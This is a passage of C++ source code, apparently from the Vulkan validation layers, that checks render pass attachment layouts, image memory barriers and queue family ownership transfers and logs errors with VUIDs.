VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT", attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str()); } if (layout == VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL && !(image_usage & (VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT | VK_IMAGE_USAGE_SAMPLED_BIT))) { vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03097" : "VUID-vkCmdBeginRenderPass-initialLayout-00897"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid, "Layout/usage mismatch for attachment %u in render pass %s" " - the %s is %s but the image attached to framebuffer %s via image view %s" " was not created with VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT or VK_IMAGE_USAGE_SAMPLED_BIT", attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str()); } if (layout == VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL && !(image_usage & VK_IMAGE_USAGE_TRANSFER_SRC_BIT)) { vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03098" : "VUID-vkCmdBeginRenderPass-initialLayout-00898"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid, "Layout/usage mismatch for attachment %u in render pass %s" " - the %s is %s but the image attached to framebuffer %s via image view %s" " was not created with VK_IMAGE_USAGE_TRANSFER_SRC_BIT", attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str()); } if (layout == VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL && !(image_usage & VK_IMAGE_USAGE_TRANSFER_DST_BIT)) { vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03099" : "VUID-vkCmdBeginRenderPass-initialLayout-00899"; skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid, "Layout/usage mismatch for attachment %u in render pass %s" " - the %s is %s but the image attached to framebuffer %s via image view %s" " was not created with VK_IMAGE_USAGE_TRANSFER_DST_BIT", attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str()); } if (GetDeviceExtensions()->vk_khr_maintenance2) { if ((layout == VK_IMAGE_LAYOUT_DEPTH_READ_ONLY_STENCIL_ATTACHMENT_OPTIMAL || layout == VK_IMAGE_LAYOUT_DEPTH_ATTACHMENT_STENCIL_READ_ONLY_OPTIMAL || layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL || layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) && !(image_usage & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT)) { vuid = use_rp2 ? "VUID-vkCmdBeginRenderPass2KHR-initialLayout-03096" : "VUID-vkCmdBeginRenderPass-initialLayout-01758"; skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), vuid, "Layout/usage mismatch for attachment %u in render pass %s" " - the %s is %s but the image attached to framebuffer %s via image view %s" " was not created with VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT", attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str()); } } else { // The create render pass 2 extension requires maintenance 2 (the previous branch), so no vuid switch needed here. if ((layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL || layout == VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL) && !(image_usage & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(image), "VUID-vkCmdBeginRenderPass-initialLayout-00896", "Layout/usage mismatch for attachment %u in render pass %s" " - the %s is %s but the image attached to framebuffer %s via image view %s" " was not created with VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT", attachment_index, report_data->FormatHandle(renderpass).c_str(), variable_name, string_VkImageLayout(layout), report_data->FormatHandle(framebuffer).c_str(), report_data->FormatHandle(image_view).c_str()); } } return skip; } bool CoreChecks::VerifyFramebufferAndRenderPassLayouts(RenderPassCreateVersion rp_version, GLOBAL_CB_NODE *pCB, const VkRenderPassBeginInfo *pRenderPassBegin, const FRAMEBUFFER_STATE *framebuffer_state) { bool skip = false; auto const pRenderPassInfo = GetRenderPassState(pRenderPassBegin->renderPass)->createInfo.ptr(); auto const &framebufferInfo = framebuffer_state->createInfo; auto render_pass = GetRenderPassState(pRenderPassBegin->renderPass)->renderPass; auto framebuffer = framebuffer_state->framebuffer; if (pRenderPassInfo->attachmentCount != framebufferInfo.attachmentCount) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(pCB->commandBuffer), kVUID_Core_DrawState_InvalidRenderpass, "You cannot start a render pass using a framebuffer with a different number of attachments."); } for (uint32_t i = 0; i < pRenderPassInfo->attachmentCount; ++i) { const VkImageView &image_view = framebufferInfo.pAttachments[i]; auto view_state = GetImageViewState(image_view); if (!view_state) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_RENDER_PASS_EXT, HandleToUint64(pRenderPassBegin->renderPass), "VUID-VkRenderPassBeginInfo-framebuffer-parameter", "vkCmdBeginRenderPass(): framebuffer %s pAttachments[%" PRIu32 "] = %s is not a valid VkImageView handle", report_data->FormatHandle(framebuffer_state->framebuffer).c_str(), i, report_data->FormatHandle(image_view).c_str()); continue; } const VkImage &image = view_state->create_info.image; const VkImageSubresourceRange &subRange = view_state->create_info.subresourceRange; auto initial_layout = pRenderPassInfo->pAttachments[i].initialLayout; auto final_layout = pRenderPassInfo->pAttachments[i].finalLayout; // TODO: Do not iterate over every possibility - consolidate where possible for (uint32_t j = 0; j < subRange.levelCount; j++) { uint32_t level = subRange.baseMipLevel + j; for (uint32_t k = 0; k < subRange.layerCount; k++) { uint32_t layer = subRange.baseArrayLayer + k; VkImageSubresource sub = {subRange.aspectMask, level, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (!FindCmdBufLayout(pCB, image, sub, node)) { // Missing layouts will be added during state update continue; } if (initial_layout != VK_IMAGE_LAYOUT_UNDEFINED && initial_layout != node.layout) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_UNKNOWN_EXT, 0, kVUID_Core_DrawState_InvalidRenderpass, "You cannot start a render pass using attachment %u where the render pass initial layout is %s " "and the previous known layout of the attachment is %s. The layouts must match, or the render " "pass initial layout for the attachment must be VK_IMAGE_LAYOUT_UNDEFINED", i, string_VkImageLayout(initial_layout), string_VkImageLayout(node.layout)); } } } ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, initial_layout, image, image_view, framebuffer, render_pass, i, "initial layout"); ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, final_layout, image, image_view, framebuffer, render_pass, i, "final layout"); } for (uint32_t j = 0; j < pRenderPassInfo->subpassCount; ++j) { auto &subpass = pRenderPassInfo->pSubpasses[j]; for (uint32_t k = 0; k < pRenderPassInfo->pSubpasses[j].inputAttachmentCount; ++k) { auto &attachment_ref = subpass.pInputAttachments[k]; if (attachment_ref.attachment != VK_ATTACHMENT_UNUSED) { auto image_view = framebufferInfo.pAttachments[attachment_ref.attachment]; auto view_state = GetImageViewState(image_view); if (view_state) { auto image = view_state->create_info.image; ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, attachment_ref.layout, image, image_view, framebuffer, render_pass, attachment_ref.attachment, "input attachment layout"); } } } for (uint32_t k = 0; k < pRenderPassInfo->pSubpasses[j].colorAttachmentCount; ++k) { auto &attachment_ref = subpass.pColorAttachments[k]; if (attachment_ref.attachment != VK_ATTACHMENT_UNUSED) { auto image_view = framebufferInfo.pAttachments[attachment_ref.attachment]; auto view_state = GetImageViewState(image_view); if (view_state) { auto image = view_state->create_info.image; ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, attachment_ref.layout, image, image_view, framebuffer, render_pass, attachment_ref.attachment, "color attachment layout"); if (subpass.pResolveAttachments) { ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, attachment_ref.layout, image, image_view, framebuffer, render_pass, attachment_ref.attachment, "resolve attachment layout"); } } } } if (pRenderPassInfo->pSubpasses[j].pDepthStencilAttachment) { auto &attachment_ref = *subpass.pDepthStencilAttachment; if (attachment_ref.attachment != VK_ATTACHMENT_UNUSED) { auto image_view = framebufferInfo.pAttachments[attachment_ref.attachment]; auto view_state = GetImageViewState(image_view); if (view_state) { auto image = view_state->create_info.image; ValidateRenderPassLayoutAgainstFramebufferImageUsage(rp_version, attachment_ref.layout, image, image_view, framebuffer, render_pass, attachment_ref.attachment, "input attachment layout"); } } } } return skip; } void CoreChecks::TransitionAttachmentRefLayout(GLOBAL_CB_NODE *pCB, FRAMEBUFFER_STATE *pFramebuffer, const safe_VkAttachmentReference2KHR &ref) { if (ref.attachment != VK_ATTACHMENT_UNUSED) { auto image_view = GetAttachmentImageViewState(pFramebuffer, ref.attachment); if (image_view) { SetImageViewLayout(pCB, image_view, ref.layout); } } } void CoreChecks::TransitionSubpassLayouts(GLOBAL_CB_NODE *pCB, const RENDER_PASS_STATE *render_pass_state, const int subpass_index, FRAMEBUFFER_STATE *framebuffer_state) { assert(render_pass_state); if (framebuffer_state) { auto const &subpass = render_pass_state->createInfo.pSubpasses[subpass_index]; for (uint32_t j = 0; j < subpass.inputAttachmentCount; ++j) { TransitionAttachmentRefLayout(pCB, framebuffer_state, subpass.pInputAttachments[j]); } for (uint32_t j = 0; j < subpass.colorAttachmentCount; ++j) { TransitionAttachmentRefLayout(pCB, framebuffer_state, subpass.pColorAttachments[j]); } if (subpass.pDepthStencilAttachment) { TransitionAttachmentRefLayout(pCB, framebuffer_state, *subpass.pDepthStencilAttachment); } } } bool CoreChecks::ValidateImageAspectLayout(GLOBAL_CB_NODE const *pCB, const VkImageMemoryBarrier *mem_barrier, uint32_t level, uint32_t layer, VkImageAspectFlags aspect) { if (!(mem_barrier->subresourceRange.aspectMask & aspect)) { return false; } VkImageSubresource sub = {aspect, level, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (!FindCmdBufLayout(pCB, mem_barrier->image, sub, node)) { return false; } bool skip = false; if (mem_barrier->oldLayout == VK_IMAGE_LAYOUT_UNDEFINED) { // TODO: Set memory invalid which is in mem_tracker currently } else if (node.layout != mem_barrier->oldLayout) { skip = log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(pCB->commandBuffer), "VUID-VkImageMemoryBarrier-oldLayout-01197", "For image %s you cannot transition the layout of aspect=%d level=%d layer=%d from %s when current layout is %s.", report_data->FormatHandle(mem_barrier->image).c_str(), aspect, level, layer, string_VkImageLayout(mem_barrier->oldLayout), string_VkImageLayout(node.layout)); } return skip; } // Transition the layout state for renderpass attachments based on the BeginRenderPass() call. This includes: // 1. Transition into initialLayout state // 2. Transition from initialLayout to layout used in subpass 0 void CoreChecks::TransitionBeginRenderPassLayouts(GLOBAL_CB_NODE *cb_state, const RENDER_PASS_STATE *render_pass_state, FRAMEBUFFER_STATE *framebuffer_state) { // First transition into initialLayout auto const rpci = render_pass_state->createInfo.ptr(); for (uint32_t i = 0; i < rpci->attachmentCount; ++i) { auto view_state = GetAttachmentImageViewState(framebuffer_state, i); if (view_state) { SetImageViewLayout(cb_state, view_state, rpci->pAttachments[i].initialLayout); } } // Now transition for first subpass (index 0) TransitionSubpassLayouts(cb_state, render_pass_state, 0, framebuffer_state); } void CoreChecks::TransitionImageAspectLayout(GLOBAL_CB_NODE *pCB, const VkImageMemoryBarrier *mem_barrier, uint32_t level, uint32_t layer, VkImageAspectFlags aspect_mask, VkImageAspectFlags aspect) { if (!(aspect_mask & aspect)) { return; } VkImageSubresource sub = {aspect, level, layer}; IMAGE_CMD_BUF_LAYOUT_NODE node; if (!FindCmdBufLayout(pCB, mem_barrier->image, sub, node)) { pCB->image_layout_change_count++; // Change the version of this data to force revalidation SetLayout(pCB, mem_barrier->image, sub, IMAGE_CMD_BUF_LAYOUT_NODE(mem_barrier->oldLayout, mem_barrier->newLayout)); return; } if (mem_barrier->oldLayout == VK_IMAGE_LAYOUT_UNDEFINED) { // TODO: Set memory invalid } SetLayout(pCB, mem_barrier->image, sub, mem_barrier->newLayout); } bool VerifyAspectsPresent(VkImageAspectFlags aspect_mask, VkFormat format) { if ((aspect_mask & VK_IMAGE_ASPECT_COLOR_BIT) != 0) { if (!(FormatIsColor(format) || FormatIsMultiplane(format))) return false; } if ((aspect_mask & VK_IMAGE_ASPECT_DEPTH_BIT) != 0) { if (!FormatHasDepth(format)) return false; } if ((aspect_mask & VK_IMAGE_ASPECT_STENCIL_BIT) != 0) { if (!FormatHasStencil(format)) return false; } if (0 != (aspect_mask & (VK_IMAGE_ASPECT_PLANE_0_BIT_KHR | VK_IMAGE_ASPECT_PLANE_1_BIT_KHR | VK_IMAGE_ASPECT_PLANE_2_BIT_KHR))) { if (FormatPlaneCount(format) == 1) return false; } return true; } // Verify an ImageMemoryBarrier's old/new ImageLayouts are compatible with the Image's ImageUsageFlags. bool CoreChecks::ValidateBarrierLayoutToImageUsage(const VkImageMemoryBarrier *img_barrier, bool new_not_old, VkImageUsageFlags usage_flags, const char *func_name) { bool skip = false; const VkImageLayout layout = (new_not_old) ? img_barrier->newLayout : img_barrier->oldLayout; const char *msg_code = kVUIDUndefined; // sentinel value meaning "no error" switch (layout) { case VK_IMAGE_LAYOUT_COLOR_ATTACHMENT_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_COLOR_ATTACHMENT_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01208"; } break; case VK_IMAGE_LAYOUT_DEPTH_STENCIL_ATTACHMENT_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01209"; } break; case VK_IMAGE_LAYOUT_DEPTH_STENCIL_READ_ONLY_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_DEPTH_STENCIL_ATTACHMENT_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01210"; } break; case VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL: if ((usage_flags & (VK_IMAGE_USAGE_SAMPLED_BIT | VK_IMAGE_USAGE_INPUT_ATTACHMENT_BIT)) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01211"; } break; case VK_IMAGE_LAYOUT_TRANSFER_SRC_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_TRANSFER_SRC_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01212"; } break; case VK_IMAGE_LAYOUT_TRANSFER_DST_OPTIMAL: if ((usage_flags & VK_IMAGE_USAGE_TRANSFER_DST_BIT) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-01213"; } break; case VK_IMAGE_LAYOUT_SHADING_RATE_OPTIMAL_NV: if ((usage_flags & VK_IMAGE_USAGE_SHADING_RATE_IMAGE_BIT_NV) == 0) { msg_code = "VUID-VkImageMemoryBarrier-oldLayout-02088"; } break; default: // Other VkImageLayout values do not have VUs defined in this context. break; } if (msg_code != kVUIDUndefined) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(img_barrier->image), msg_code, "%s: Image barrier 0x%p %sLayout=%s is not compatible with image %s usage flags 0x%" PRIx32 ".", func_name, static_cast<const void *>(img_barrier), ((new_not_old) ? "new" : "old"), string_VkImageLayout(layout), report_data->FormatHandle(img_barrier->image).c_str(), usage_flags); } return skip; } // Scoreboard for checking for duplicate and inconsistent barriers to images struct ImageBarrierScoreboardEntry { uint32_t index; // This is designed for temporary storage within the scope of the API call. If retained storage of the barriers is // required, copies should be made and smart or unique pointers used in some other stucture (or this one refactored) const VkImageMemoryBarrier *barrier; }; using ImageBarrierScoreboardSubresMap = std::unordered_map<VkImageSubresourceRange, ImageBarrierScoreboardEntry>; using ImageBarrierScoreboardImageMap = std::unordered_map<VkImage, ImageBarrierScoreboardSubresMap>; // Verify image barriers are compatible with the images they reference. bool CoreChecks::ValidateBarriersToImages(GLOBAL_CB_NODE const *cb_state, uint32_t imageMemoryBarrierCount, const VkImageMemoryBarrier *pImageMemoryBarriers, const char *func_name) { bool skip = false; // Scoreboard for duplicate layout transition barriers within the list // Pointers retained in the scoreboard only have the lifetime of *this* call (i.e. within the scope of the API call) ImageBarrierScoreboardImageMap layout_transitions; for (uint32_t i = 0; i < imageMemoryBarrierCount; ++i) { auto img_barrier = &pImageMemoryBarriers[i]; if (!img_barrier) continue; // Update the scoreboard of layout transitions and check for barriers affecting the same image and subresource // TODO: a higher precision could be gained by adapting the command_buffer image_layout_map logic looking for conflicts // at a per sub-resource level if (img_barrier->oldLayout != img_barrier->newLayout) { ImageBarrierScoreboardEntry new_entry{i, img_barrier}; auto image_it = layout_transitions.find(img_barrier->image); if (image_it != layout_transitions.end()) { auto &subres_map = image_it->second; auto subres_it = subres_map.find(img_barrier->subresourceRange); if (subres_it != subres_map.end()) { auto &entry = subres_it->second; if ((entry.barrier->newLayout != img_barrier->oldLayout) && (img_barrier->oldLayout != VK_IMAGE_LAYOUT_UNDEFINED)) { const VkImageSubresourceRange &range = img_barrier->subresourceRange; skip = log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), "VUID-VkImageMemoryBarrier-oldLayout-01197", "%s: pImageMemoryBarrier[%u] conflicts with earlier entry pImageMemoryBarrier[%u]. Image %s" " subresourceRange: aspectMask=%u baseMipLevel=%u levelCount=%u, baseArrayLayer=%u, layerCount=%u; " "conflicting barrier transitions image layout from %s when earlier barrier transitioned to layout %s.", func_name, i, entry.index, report_data->FormatHandle(img_barrier->image).c_str(), range.aspectMask, range.baseMipLevel, range.levelCount, range.baseArrayLayer, range.layerCount, string_VkImageLayout(img_barrier->oldLayout), string_VkImageLayout(entry.barrier->newLayout)); } entry = new_entry; } else { subres_map[img_barrier->subresourceRange] = new_entry; } } else { layout_transitions[img_barrier->image][img_barrier->subresourceRange] = new_entry; } } auto image_state = GetImageState(img_barrier->image); if (image_state) { VkImageUsageFlags usage_flags = image_state->createInfo.usage; skip |= ValidateBarrierLayoutToImageUsage(img_barrier, false, usage_flags, func_name); skip |= ValidateBarrierLayoutToImageUsage(img_barrier, true, usage_flags, func_name); // Make sure layout is able to be transitioned, currently only presented shared presentable images are locked if (image_state->layout_locked) { // TODO: Add unique id for error when available skip |= log_msg( report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(img_barrier->image), 0, "Attempting to transition shared presentable image %s" " from layout %s to layout %s, but image has already been presented and cannot have its layout transitioned.", report_data->FormatHandle(img_barrier->image).c_str(), string_VkImageLayout(img_barrier->oldLayout), string_VkImageLayout(img_barrier->newLayout)); } } VkImageCreateInfo *image_create_info = &(GetImageState(img_barrier->image)->createInfo); // For a Depth/Stencil image both aspects MUST be set if (FormatIsDepthAndStencil(image_create_info->format)) { auto const aspect_mask = img_barrier->subresourceRange.aspectMask; auto const ds_mask = VK_IMAGE_ASPECT_DEPTH_BIT | VK_IMAGE_ASPECT_STENCIL_BIT; if ((aspect_mask & ds_mask) != (ds_mask)) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_IMAGE_EXT, HandleToUint64(img_barrier->image), "VUID-VkImageMemoryBarrier-image-01207", "%s: Image barrier 0x%p references image %s of format %s that must have the depth and stencil " "aspects set, but its aspectMask is 0x%" PRIx32 ".", func_name, static_cast<const void *>(img_barrier), report_data->FormatHandle(img_barrier->image).c_str(), string_VkFormat(image_create_info->format), aspect_mask); } } uint32_t level_count = ResolveRemainingLevels(&img_barrier->subresourceRange, image_create_info->mipLevels); uint32_t layer_count = ResolveRemainingLayers(&img_barrier->subresourceRange, image_create_info->arrayLayers); for (uint32_t j = 0; j < level_count; j++) { uint32_t level = img_barrier->subresourceRange.baseMipLevel + j; for (uint32_t k = 0; k < layer_count; k++) { uint32_t layer = img_barrier->subresourceRange.baseArrayLayer + k; skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_COLOR_BIT); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_DEPTH_BIT); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_STENCIL_BIT); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_METADATA_BIT); if (GetDeviceExtensions()->vk_khr_sampler_ycbcr_conversion) { skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_PLANE_0_BIT_KHR); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_PLANE_1_BIT_KHR); skip |= ValidateImageAspectLayout(cb_state, img_barrier, level, layer, VK_IMAGE_ASPECT_PLANE_2_BIT_KHR); } } } } return skip; } bool CoreChecks::IsReleaseOp(GLOBAL_CB_NODE *cb_state, VkImageMemoryBarrier const *barrier) { if (!IsTransferOp(barrier)) return false; auto pool = GetCommandPoolNode(cb_state->createInfo.commandPool); return pool && TempIsReleaseOp<VkImageMemoryBarrier, true>(pool, barrier); } template <typename Barrier> bool CoreChecks::ValidateQFOTransferBarrierUniqueness(const char *func_name, GLOBAL_CB_NODE *cb_state, uint32_t barrier_count, const Barrier *barriers) { using BarrierRecord = QFOTransferBarrier<Barrier>; bool skip = false; auto pool = GetCommandPoolNode(cb_state->createInfo.commandPool); auto &barrier_sets = GetQFOBarrierSets(cb_state, typename BarrierRecord::Tag()); const char *barrier_name = BarrierRecord::BarrierName(); const char *handle_name = BarrierRecord::HandleName(); const char *transfer_type = nullptr; for (uint32_t b = 0; b < barrier_count; b++) { if (!IsTransferOp(&barriers[b])) continue; const BarrierRecord *barrier_record = nullptr; if (TempIsReleaseOp<Barrier, true /* Assume IsTransfer */>(pool, &barriers[b]) && !IsSpecial(barriers[b].dstQueueFamilyIndex)) { const auto found = barrier_sets.release.find(barriers[b]); if (found != barrier_sets.release.cend()) { barrier_record = &(*found); transfer_type = "releasing"; } } else if (IsAcquireOp<Barrier, true /*Assume IsTransfer */>(pool, &barriers[b]) && !IsSpecial(barriers[b].srcQueueFamilyIndex)) { const auto found = barrier_sets.acquire.find(barriers[b]); if (found != barrier_sets.acquire.cend()) { barrier_record = &(*found); transfer_type = "acquiring"; } } if (barrier_record != nullptr) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgDuplicateQFOInCB(), "%s: %s at index %" PRIu32 " %s queue ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32 " to dstQueueFamilyIndex %" PRIu32 " duplicates existing barrier recorded in this command buffer.", func_name, barrier_name, b, transfer_type, handle_name, report_data->FormatHandle(barrier_record->handle).c_str(), barrier_record->srcQueueFamilyIndex, barrier_record->dstQueueFamilyIndex); } } return skip; } template <typename Barrier> void CoreChecks::RecordQFOTransferBarriers(GLOBAL_CB_NODE *cb_state, uint32_t barrier_count, const Barrier *barriers) { auto pool = GetCommandPoolNode(cb_state->createInfo.commandPool); auto &barrier_sets = GetQFOBarrierSets(cb_state, typename QFOTransferBarrier<Barrier>::Tag()); for (uint32_t b = 0; b < barrier_count; b++) { if (!IsTransferOp(&barriers[b])) continue; if (TempIsReleaseOp<Barrier, true /* Assume IsTransfer*/>(pool, &barriers[b]) && !IsSpecial(barriers[b].dstQueueFamilyIndex)) { barrier_sets.release.emplace(barriers[b]); } else if (IsAcquireOp<Barrier, true /*Assume IsTransfer */>(pool, &barriers[b]) && !IsSpecial(barriers[b].srcQueueFamilyIndex)) { barrier_sets.acquire.emplace(barriers[b]); } } } bool CoreChecks::ValidateBarriersQFOTransferUniqueness(const char *func_name, GLOBAL_CB_NODE *cb_state, uint32_t bufferBarrierCount, const VkBufferMemoryBarrier *pBufferMemBarriers, uint32_t imageMemBarrierCount, const VkImageMemoryBarrier *pImageMemBarriers) { bool skip = false; skip |= ValidateQFOTransferBarrierUniqueness(func_name, cb_state, bufferBarrierCount, pBufferMemBarriers); skip |= ValidateQFOTransferBarrierUniqueness(func_name, cb_state, imageMemBarrierCount, pImageMemBarriers); return skip; } void CoreChecks::RecordBarriersQFOTransfers(GLOBAL_CB_NODE *cb_state, uint32_t bufferBarrierCount, const VkBufferMemoryBarrier *pBufferMemBarriers, uint32_t imageMemBarrierCount, const VkImageMemoryBarrier *pImageMemBarriers) { RecordQFOTransferBarriers(cb_state, bufferBarrierCount, pBufferMemBarriers); RecordQFOTransferBarriers(cb_state, imageMemBarrierCount, pImageMemBarriers); } template <typename BarrierRecord, typename Scoreboard> bool CoreChecks::ValidateAndUpdateQFOScoreboard(const debug_report_data *report_data, const GLOBAL_CB_NODE *cb_state, const char *operation, const BarrierRecord &barrier, Scoreboard *scoreboard) { // Record to the scoreboard or report that we have a duplication bool skip = false; auto inserted = scoreboard->insert(std::make_pair(barrier, cb_state)); if (!inserted.second && inserted.first->second != cb_state) { // This is a duplication (but don't report duplicates from the same CB, as we do that at record time skip = log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgDuplicateQFOInSubmit(), "%s: %s %s queue ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32 " to dstQueueFamilyIndex %" PRIu32 " duplicates existing barrier submitted in this batch from command buffer %s.", "vkQueueSubmit()", BarrierRecord::BarrierName(), operation, BarrierRecord::HandleName(), report_data->FormatHandle(barrier.handle).c_str(), barrier.srcQueueFamilyIndex, barrier.dstQueueFamilyIndex, report_data->FormatHandle(inserted.first->second).c_str()); } return skip; } template <typename Barrier> bool CoreChecks::ValidateQueuedQFOTransferBarriers(GLOBAL_CB_NODE *cb_state, QFOTransferCBScoreboards<Barrier> *scoreboards) { using BarrierRecord = QFOTransferBarrier<Barrier>; using TypeTag = typename BarrierRecord::Tag; bool skip = false; const auto &cb_barriers = GetQFOBarrierSets(cb_state, TypeTag()); const GlobalQFOTransferBarrierMap<Barrier> &global_release_barriers = GetGlobalQFOReleaseBarrierMap(TypeTag()); const char *barrier_name = BarrierRecord::BarrierName(); const char *handle_name = BarrierRecord::HandleName(); // No release should have an extant duplicate (WARNING) for (const auto &release : cb_barriers.release) { // Check the global pending release barriers const auto set_it = global_release_barriers.find(release.handle); if (set_it != global_release_barriers.cend()) { const QFOTransferBarrierSet<Barrier> &set_for_handle = set_it->second; const auto found = set_for_handle.find(release); if (found != set_for_handle.cend()) { skip |= log_msg(report_data, VK_DEBUG_REPORT_WARNING_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgDuplicateQFOSubmitted(), "%s: %s releasing queue ownership of %s (%s), from srcQueueFamilyIndex %" PRIu32 " to dstQueueFamilyIndex %" PRIu32 " duplicates existing barrier queued for execution, without intervening acquire operation.", "vkQueueSubmit()", barrier_name, handle_name, report_data->FormatHandle(found->handle).c_str(), found->srcQueueFamilyIndex, found->dstQueueFamilyIndex); } } skip |= ValidateAndUpdateQFOScoreboard(report_data, cb_state, "releasing", release, &scoreboards->release); } // Each acquire must have a matching release (ERROR) for (const auto &acquire : cb_barriers.acquire) { const auto set_it = global_release_barriers.find(acquire.handle); bool matching_release_found = false; if (set_it != global_release_barriers.cend()) { const QFOTransferBarrierSet<Barrier> &set_for_handle = set_it->second; matching_release_found = set_for_handle.find(acquire) != set_for_handle.cend(); } if (!matching_release_found) { skip |= log_msg(report_data, VK_DEBUG_REPORT_ERROR_BIT_EXT, VK_DEBUG_REPORT_OBJECT_TYPE_COMMAND_BUFFER_EXT, HandleToUint64(cb_state->commandBuffer), BarrierRecord::ErrMsgMissingQFOReleaseInSubmit(), 